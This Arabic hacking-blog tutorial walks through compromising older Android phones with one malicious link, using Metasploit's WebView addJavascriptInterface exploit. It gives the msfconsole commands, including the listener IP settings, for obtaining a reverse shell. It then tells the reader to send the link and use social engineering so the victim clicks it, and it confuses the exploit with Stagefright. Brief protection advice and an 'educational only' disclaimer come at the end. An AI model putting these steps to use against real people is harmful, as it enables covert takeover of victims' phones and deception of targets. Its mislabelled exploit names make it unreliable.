مافيا سفن أكس - Mafia7x

اختراق أجهزة Android برابط (Javascript & WebView Exploit)

صورة الكاتب - Mafia7x - نشر في 05-11-2021 | التصنيف: اختبار الاختراق
Hack-Android-With-Link

اختراق Android ليس بالأمر الصعب ، ولكنه صعب ، في هذا الدرس للأختراق سنستغل عرض الويب (WebView Exploit) وثغرة جافا سكريبت التي تسمح للقراصنة باختراق جهاز Android برابط واحد ، سنقوم بإثبات اختراق اختراق عن بعد للسيطرة على جهاز أندرويد بنقرة واحدة على رابط ضار يسمح للمتسلل بالحصول على أتصال عكسي ، يُعرف هذا الاستغلال عادةً باسم استغلال عرض الويب ، يستغل ثغرة أمنية في عرض الويب في نظام Android في الإصدار 2.1 إلى 4.2 (Jellybean) ، لاحظ أن هذه الثغرة الأمنية تعمل فقط عندما تكون طريقة عرض الويب نشطة وتستخدم لفتح الرابط ، هذا نشط بشكل افتراضي في جميع هواتف Android التي تحتوي على متصفحات الـStock.


كيف يتم هذا الأختراق

يستغل هذا الاختراق مشكلة تصعيد الامتياز في الإصدارات التي اقل من 4.2 من Android ، والثغرة الأمنية في مكون WebView تسمح بتنفيذ تعليمات برمجية بلغة Javascript غير موثوق بها بواسطة WebView الذي يحتوي على واجهة جافا سكريبت واحدة أو أكثر مضافة إليها ، يمكن أن تستدعي شفرة Javascript غير الموثوقة واجهات برمجة تطبيقات Java Reflection API التي تعرضها الواجهة وتنفيذ أوامر عشوائية يمكن أن تمنح الوصول عن بُعد والـ Shell للمتسللين ، تحتوي بعض توزيعات تطبيق Android Browser على استدعاء "addJavascriptInterface" ، وبالتالي فهي عرضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) ، من المعروف أن تطبيق Browser في Android معرض لهذا الاستغلال ، يمكن للمتسلل الآن إرسال رابط ضار للضحية ، وإذا كانت الضحية عرضة للخطر ، فسيقوم الجهاز بإعادة reverse shell إلى المهاجم ، هذه هي الطريقة التي يخترق بها المتسللون هواتف Android ، والان لنبدأ في القرصنة باستغلال الـ WebView.


شاهد أيضا أهم 10 مهارات يجب أن يتعلمها كل هكر.

اختراق أجهزة Android برابط

الخطوة 1: افتح الـ Terminal

في الخطوة الأولى عليك فتح الـ Terminal أو الـ Termux أذا كنت تستعمل الاندرويد وأيضا أذا كنت تود استعمال الـ Terminal في الأندرويد فتستطيع رؤية درس "تثبيت الكالي لينكس على الاندرويد واجهة رسومية" ، والأن افتح وحدة التحكم Metasploit عن طريق الأمر التالي:

msfconsole
 

والأن لقد قمنا بتشغيل أداة Metasploit كما موضح في الصورة التالية:

الخطوة 2: تعيين خادم Metasploit لاستخدام استغلال Webview

لإعداد Metasploit ، أكتب الأوامر التالية في وحدة تحكم msf:

use exploit/android/browser/webview_addjavascriptinterface
set SRVHOST 192.168.182.136 (your IP here)
/ set URIPATH
set lhost 192.168.182.136 (your IP here)
exploit
 

والان قد تم أنشاء الرابط لأستغلال الـ WebView كما موضح في الصورة التالية:


شاهد أيضا أداة Ghost Framework للتحكم بأجهزة Android عن بعد.

الخطوة 3: استغلال الهدف المصاب بثغرة Stagefright

بعد أن تم تشغيل استغلال الـ WebView ، والان أرسل الرابط الخبيث إلى الهدف وقم ببعض الهندسة الأجتماعية لأقناعه بالضغط على الرابط لأختراق جهازه.

وفي حالتي الرابط هو: http://192.168.182.136:8080

ملاحظة: يعمل هذا الهجوم فقط على أجهزة Android محدودة ذات واجهة برمجة تطبيقات WebView ضعيفة.

الخطوة 4: أستمتع بالاختراق

بمجرد أن ينقر الضحية على الرابط الخبيث ، سيتم اختراق جهاز Android الخاص به. ويمكنك التحكم فيه عن بعد باستخدام ثغرة عرض الويب. هذا هو مدى سهولة اختراق جهاز Android برابط.


كيفية الحماية من هذا الاختراق

تحقق مما إذا كان جهازك عرضة للخطر ، استخدم تطبيق Norton Explit Security للتحقق مما إذا كان جهازك عرضة للاستغلال.

قم بتحديث جهازك: تم إصلاح هذا الخطأ منذ فترة طويلة ، تأكد من تحديث جهاز Android الخاص بك حتى لا تكون عرضة لهذه الثغرة ، وأيضا تأكد من تحديث المتصفح الخاص بك.

قم بتغيير جهاز Android الخاص بك: اشترِ جهازًا جديدًا بآخر التحديثات.

تثبيت مضاد فيروسات: قم بتثبيت مضاد فيروسات جيد على هاتف Android الخاص بك.

متجر التطبيقات: قم فقط بتثبيت التطبيقات من متجر التطبيقات الرسمي ، لا تفتح روابط وملفات غير معروفة ولا تثق بها ابداً.


شاهد أيضا كيفية تتبع موقع اي شخص عن طريق أداة Seeker مع تثبيت Ngrok.

الأسئلة المتداولة عن أستغلال ثغرة Stagefright

س 1) هل يعمل على جميع الهواتف؟

لا ، فقط الهواتف التي تعمل بنظام Android ، الإصدار Jellybean والإصدارات الأقدم.

س 2) أنها لا تعمل على نظام Kali الخاص بي؟

قم بتحديث Kali Linux وحاول مرة أخرى ، حاول تكرار كل الخطوات ، إذا تلقيت خطأً محددًا ، فاذكره في قسم التعليقات.

س 3) أريد اختراق هاتف الـ Android الخاص بصديقتي باستغلال الـ WebView ، قل لي كيف؟

هذا النوع من الطلبات غير مقبول ، يرجى استخدام هذا الدرس للأغراض التعليمية فقط ، لا تسيء استخدام معرفة القرصنة باستغلال الـ WebView.


خاتمة

وهنا وصلنا لنهاية هذه التدوينة قد تعرفنا الأن على طريقة أختراق أجهزة الـ Android عن طريق أستغلال ثغرة Stagefright التي تسمح لنا بأختراق اجهزة الـ Android عن طريق رابط ، وايضا انا أخلي مسؤليتي لأي استخدام سيء لهذه التدوينة وأنها لأغراض تعليمية فقط وكاتب التدوينة غير مسؤل عن أي شيء يحدث لأي شخص ومع السلامة.

كاتب التدوينة
صورة التدوينة
Mafia7x   

     لا يوجد وصف Ok

close

عن أبي هريرة(رضي الله عنه): (قال رسول الله (صلى الله عليه وسلم):(كلمتان خفيفتان على اللسان، ثقيلتان في الميزان، حبيبتان إلى الرحمن: سبحان الله وبحمده، سبحان الله العظيم))